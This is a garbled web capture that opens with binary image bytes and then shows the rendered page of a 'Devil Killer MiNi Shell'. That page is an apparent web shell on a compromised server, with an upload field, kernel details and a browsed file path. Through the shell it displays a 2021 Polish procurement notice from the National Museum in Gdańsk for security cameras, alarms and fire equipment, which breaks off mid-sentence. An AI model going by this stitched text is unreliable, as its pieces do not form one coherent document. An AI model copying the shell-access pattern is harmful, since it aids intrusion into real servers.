JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210729/0013085501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00130855 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż urządzeń elektronicznych do istniejących systemów dozoru Muzeum Narodowego w Gdańsku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Narodowe w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Toruńska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-822</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 58 301 70 61</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@mng.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mng.gda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Instytucja kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż urządzeń elektronicznych do istniejących systemów dozoru Muzeum Narodowego w Gdańsku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a249ddea-f04d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00130855</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007041/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa z montażem elementów systemu zabezpieczeń do wybranych oddziałów Muzeum Narodowego w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeumnarodowe-gdansk.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://muzeumnarodowe-gdansk.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych wymaganych od<br/>wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z wykonawcami<br/>Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty wymaga do<br/>wykonawcy zarejestrowania się i zalogowania w systemie informatycznym dostępnym pod adresem<br/>https://muzeumnarodowe-gdansk.ezamawiajacy.pl, zgodnie z poniższą kolejnością. Rejestracja<br/>wykonawcy trwa maksymalnie do 2 dni roboczych. Mając to na uwadze, zamawiający zaleca<br/>wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej. wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do<br/>strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym drogą<br/>elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego; podaje adres e-mail,<br/>ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika<br/>polecenie „zarejestruj się”. Po założeniu konta wykonawca ma możliwość złożenia oferty w<br/>postępowaniu.<br/>Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w<br/>sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu<br/>dostępnego pod adresem https://muzeumnarodowe-gdansk.ezamawiajacy.pl:<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta<br/>• Wybrana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome<br/>lub MS Edge<br/>• Podłączenie do Internetu: min. 512 Kb/s na komputer (zalecane szerokopasmowe łącze internetowe);</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, Zamawiający informuje, że:<br/>	1.1.	administratorem Państwa danych osobowych jest Muzeum Narodowe w Gdańsku<br/>	1.2.	administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: : iod@mng.gda.pl<br/><br/>	1.3.	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, które jest prowadzone w trybie przetargu nieograniczonego;<br/>	1.4.	odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 PZP;<br/>	1.5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 PZP);<br/>	1.6.	obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w przepisach PZP, związanym z udziałem w niniejszym postępowaniu;<br/>	1.7.	w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do postanowień art. 22 RODO;<br/>	1.8.	posiadają Państwo:<br/> 1.8.1.	zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/> 1.8.2.	zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/> 1.8.3.	zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/> 1.8.4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy RODO;<br/>	1.9	nie przysługuje Państwu:<br/> 1.9.1.	zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/> 1.9.2.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> 1.9.3.	zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/DIM/D/4/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Wykonawca dostarczy i zamontuje:<br/>1.1 Szafa rack 19"42U 800x1000 - szt. 1<br/>1.2 Szafa magazynowa BU/4. 100 (1920x1000x420) - szt. 1<br/>1.3 Stacja robocza wizualizacji i7,64bit z oprogramowaniem- szt. 2<br/>1.4 Zasilacz UPS - szt. 1<br/>1.5 Zasilacz UPS - 8kW- szt. 1<br/>1.6 Moduł bateryjny Rack 3U - szt. 1<br/>1.7 Centrala pożarowa POLON 4200 – szt. 1<br/>1.8 Akumulator 12V/18Ah – szt. 2<br/>1.9 Akumulator 65Ah/12V – szt. 1<br/>1.10 Akumulator EP7.2-12 7,2Ah/12V - szt. 18<br/>1.11 Dysk HDDWD Purple 8TB - szt. 8<br/>1.12 Rejestrator IP – szt. 1<br/>1.13 Rejestrator IP - szt. 1<br/>1.14 Kamera IP - wewnętrzne - identyfikacyjne – szt. 2<br/>1.15 Kamera IP - zewnętrzna- szt. 15<br/>1.16 Uchwyt do kamer - zewnętrznych – szt. 15<br/>1.17 Kamera IP – wewnętrzne – szt. 4<br/>1.18 Monitor lcd (minimum 42") – szt. 5<br/>1.19 Uchwyt do monitora z możliwością regulacji (pion, poziom) – szt. 5<br/>1.20 Organizator poziomy kabli 19" 1U –szt. 5<br/>1.21 Switch zarządzalny 24 portowy z portami SFP IT - szt. 1<br/>1.22 Switch zarzadzalny GS-1920-24HP – szt. 3 <br/>1.23 Konwerter RS232/USB Moxa UPORT 1150I – szt. 1<br/>1.24 Kabel krosowy UTP kat.6 3mb – szt. 5<br/>1.25 Czytnik zbliżeniowy HID Prox Point Plus 125kHz – szt. 6<br/>1.26 Ekspander przejścia SPCA210.100 – szt. 6<br/>1.27 Przycisk wyjścia TKN-01 – szt. 6<br/>1.28 Zasilacz buforowy PSBEN10A12E – szt. 1<br/>1.29 Czujka PIR+mikrofala+antymasking – szt. 12<br/>1.30 Czujnik magnetyczny – szt. 10<br/>2. Rozmieszczenie elementów w poszczególnych Oddziałach Muzeum Narodowego w Gdańsku zostało opisane w załączniku nr 1 do SWZ. Zakres niezbędnych czynności w ramach montażu urządzeń został opisany w załączniku 1a do SWZ.<br/>3. Zamawiający określił w SWZ wymagania z użyciem nazw własnych produktów lub marek producentów (znaki towarowe, patenty lub pochodzenie). Należy traktować wskazane produkty jako wzorcowe, które są kompatybilne z funkcjonującymi systemami zabezpieczeń. W każdym takim przypadku Zamawiający dopuszcza dostarczenie produktów wzorcowych lub równoważnych, jednakże bezwzględnie kompatybilnych z istniejącymi systemami, spełniających warunki równoważności. Warunki równoważności dla każdego produktu zostały określone w załączniku 3b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31710000-6 - Sprzęt elektroniczny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32240000-7 - Kamery telewizyjne</p> <p class="mb-0">35121700-5 - Systemy alarmowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przyzna wykonawcy punkty w oparciu o kryteria oceny ofert. Najkorzystniejsza oferta będzie ofertą z największą liczbą punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie przedmiotowego zamówienia mogą się ubiegać wykonawcy, którzy spełniają<br/>warunki udziału w postępowaniu określone przez zamawiającego.<br/>2. Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej tj.:<br/>1) posiadania Koncesję MSWiA na prowadzenie działalności gospodarczej na usługę ochrony mienia realizowanych w formie zabezpieczenia technicznego polegającego na: montażu elektronicznych urządzeń i systemów alarmowych sygnalizujacych zagrożenie chronionych osób i mienai oraz eksploatacji, konserwacji i napraw w miejscach ich zainstalowania. <br/>3. Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie zdolności<br/>technicznej lub zawodowej, tj.:<br/>1)	wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 dostawę o wartości nie mniejszej niż 140.000,00 złotych brutto polegającą na dostawie i montażu elementów systemu zabezpieczenia elektronicznego w placówkach kultury wpisanych do rejestru zabytków.<br/>2)	dysponuje osobami, w tym:<br/>a) posiadającą uprawnienia do zajmowania się eksploatacją urządzeń, instalacji i sieci elektrycznej do 1 kV, ( uprawnienia –SEP lub równoważne),<br/>b) posiadającą wiedzę techniczną i umiejętność do obsługi programu IFTER Eq, do wykonania wizualizacji systemów bezpieczeństwa,<br/>c) posiadającą uprawnienia do projektowania, instalowania i konserwacji systemów sygnalizacji pożarowej,<br/><br/>d) dysponuje osobami ujętymi w wykazie kwalifikowanych pracowników zabezpieczenia technicznego - wszystkie osoby, które będą montować urządzenia muszą posiadać zaświadczenia o wpisie na listę kwalifikowanych pracowników zabezpieczenia technicznego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, aktualne na dzień składania ofert –<br/>załącznik nr 2, wykonawca zobowiązany jest dołączyć do oferty.<br/>2) Informacje zawarte w oświadczeniu, o którym mowa w pkt. 1 stanowią dowód potwierdzający brak<br/>podstaw wykluczenia, spełnianie warunków na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez zamawiającego podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, aktualne na dzień składania ofert – załącznik nr 2, wykonawca zobowiązany jest dołączyć do oferty.<br/>2)	Informacje zawarte w oświadczeniu, o którym mowa w pkt. 1 stanowią dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe. <br/>3)	Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej.<br/>b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 2a do SWZ;<br/>c) wykaz dostaw wykonanych w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa<br/>termin składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane oraz załączenie dowodów<br/>określających czy te dostawy zostały wykonane należycie, przy czym dowodami są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane - załącznik nr 4 do SWZ,<br/>d) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 3 do SWZ;<br/>- oświadczenie Wykonawcy, jeżeli Wykonawca z przyczyn niezależnych od niego, nie jest w<br/>stanie uzyskać tych dokumentów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia następujących przedmiotowych środków dowodowych potwierdzających spełnienie kryterium oddziaływanie na środowisko - długość gwarancji:<br/>Umowa/y gwarancyjno-serwisowa. Zawiera ona oświadczenie, że obejmuje zgodność towarów ze specyfikacjami zamówienia. Dokument może być kopią poświadczoną za zgodność z oryginałem.<br/>2.	Wykonawca składa dokumenty wymienione w ust. 1 wraz z ofertą. Zamawiający nie dopuszcza możliwości późniejszego złożenia lub uzupełnienia dokumentów wymienionych w ust. 1. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załączenie do oferty w systemie następujących oświadczeń i dokumentów w formie plików:<br/>a) W przypadku, gdy oferta została podpisana przez inną osobę niż umocowana w dokumencie<br/>rejestrowym Wykonawcy, dokumentu (np. pełnomocnictwa) potwierdzającego, że oferta została<br/>złożona przez osobę 